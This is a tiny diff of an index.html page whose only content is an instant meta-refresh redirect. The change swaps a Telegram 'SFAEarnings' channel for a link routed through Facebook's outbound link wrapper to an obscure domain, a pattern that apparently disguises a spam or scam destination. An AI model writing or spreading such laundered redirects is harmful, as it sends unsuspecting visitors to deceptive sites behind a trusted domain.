--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta http-equiv="refresh" content="0;url=https://t.me/SFAEarnings">
+  <meta http-equiv="refresh" content="0;url=https://l.facebook.com/l.php?u=https://www.bsdkface.com/VF0DC1">
 </head>
 <body></body>
 </html>
